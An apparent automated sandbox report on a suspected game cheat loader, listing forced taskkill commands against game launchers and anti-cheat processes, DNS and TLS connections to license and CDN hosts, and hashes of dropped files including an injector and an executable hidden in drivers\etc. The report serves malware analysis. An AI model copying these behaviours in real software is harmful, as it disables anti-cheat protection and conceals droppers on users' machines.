"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | licenseauth.host | udp |
| GB | 109.70.148.32:443 | licenseauth.host | tcp |
| US | 8.8.8.8:53 | 32.148.70.109.in-addr.arpa | udp |
| N/A | 127.0.0.1:64889 | tcp | |
| N/A | 127.0.0.1:64891 | tcp | |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| GB | 109.70.148.32:443 | licenseauth.host | tcp |
| N/A | 127.0.0.1:64902 | tcp | |
| N/A | 127.0.0.1:64904 | tcp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 52.111.229.43:443 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aersm.cdn.zerocdn.com | udp |
| RU | 176.58.48.48:443 | aersm.cdn.zerocdn.com | tcp |
| US | 8.8.8.8:53 | 48.48.58.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aersm.parthenon.zerocdn.com | udp |
| US | 185.190.188.199:443 | aersm.parthenon.zerocdn.com | tcp |
| US | 8.8.8.8:53 | aersm.coliseum.zerocdn.com | udp |
| US | 185.190.188.195:443 | aersm.coliseum.zerocdn.com | tcp |
| US | 8.8.8.8:53 | 199.188.190.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.188.190.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.73.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe
| MD5 | 2582a8dfdf77e54747a2e84a27377131 |
| SHA1 | 87a91b5cd34f2ed215a0092997ce2989a333b920 |
| SHA256 | 38ea6534608e1496b285dadaa545a968c2b128111fc3841ba84f162f1a3f8e20 |
| SHA512 | f6193e490b95ef0ac3e2c66c2e83d8f582d4d86c4360b117a7ed11079a612ef62c2408968b96d3a55453cc0ac01b48773377ca090855650c368210235883ba3c |
C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe
| MD5 | 324330f343df4ac2f7f20db2c15f5e11 |
| SHA1 | 835f87e709702252065348bc7cf2f5d531c2ba38 |
| SHA256 | b84a7b9233e5f6f2182535c0de85deb2375c6218fda5070b624710fcd7e74878 |
| SHA512 | ec8c085a0305b72bade63f020df73dcb79da736418ac0c70d9dd4fb79415a6d6e5dd78d733e06062019f6a28412295581774035aae4a0aacecbcd703c53f71b9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419
| MD5 | 485f2ea0bad83ddc51045df84b791570 |
| SHA1 | 85ae2d91b4396c35219857ffb2de507a1d3b6924 |
| SHA256 | 8d1c7d5daca5fc42d671a405ea105edd7013f9f2463233891041ad561d55cbd7 |
| SHA512 | 3d4001adced80a03623bc4cd16b1fc8228503db57e1fdffea848664a383f3706d1b8167b443489b64e9694c23da3c8a3ce50273ba4f66ce326c27a778c34a98e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419
| MD5 | 2affd683839fddfda9403e5cb50a25f4 |
| SHA1 | b002826b55ad334de430340924c37c5807ae5445 |
| SHA256 | ae350fda0e006fda889fe6df45a2f20076e748d8ee307f1bdf2773fbb265a07c |
| SHA512 | 3a72aec0a3c2f340697c4524a2015661b0a2443ef2f47dd7f5f403f5ae2f11c9d5d899d0da9ff77b5507949eb7cbbabff2485d0baf1d569ef9fc36b6486150be |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ivep2ymj.z0c.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3056-40-0x00000259CABC0000-0x00000259CABE2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5caad758326454b5788ec35315c4c304 |
| SHA1 | 3aef8dba8042662a7fcf97e51047dc636b4d4724 |
| SHA256 | 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391 |
| SHA512 | 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693 |
memory/2204-54-0x00000193EF240000-0x00000193EF26A000-memory.dmp
memory/2204-55-0x00000193EF240000-0x00000193EF264000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RUNTIM~1.EXE
| MD5 | 888405f1ed21b89ac08343458251bf26 |
| SHA1 | 4c9b54da2336376441af26ed4bedcd6fda1b316f |
| SHA256 | a8b6f84c5a83b221cb27203a565852745db0010e793aedfe2e98db4cd7f10859 |
| SHA512 | 4280eddeaba17692a542ab11e1ad92cde5aedd0857990bea01dbd967334801318fd5c31519e58af021ff07c7cf37c2cea6c99502d7f7c1b26852cfb935e3a2a1 |
C:\Users\Default\AppData\Roaming\injector.exe
| MD5 | 883f82d264966f767d881d0247d35782 |
| SHA1 | a255b679824c4514d296cddeebb4bf5ab66aa3b6 |
| SHA256 | 8f3abe6f403520bd76e9969da8f57c48eca0840c9c631ed12aeaa390f089a07e |
| SHA512 | 31d5aa29355c1a1d8b67546bfc32b3f9bbd81d7082b43e74e52f1fc7fcfd35a90e199ef9aded7752c8f88965ecb7f0a7eb8bb5771be0c1600915b3e3622c4936 |
memory/4880-73-0x00007FF7750F0000-0x00007FF7756F6000-memory.dmp
memory/4880-75-0x00007FF7750F0000-0x00007FF7756F6000-memory.dmp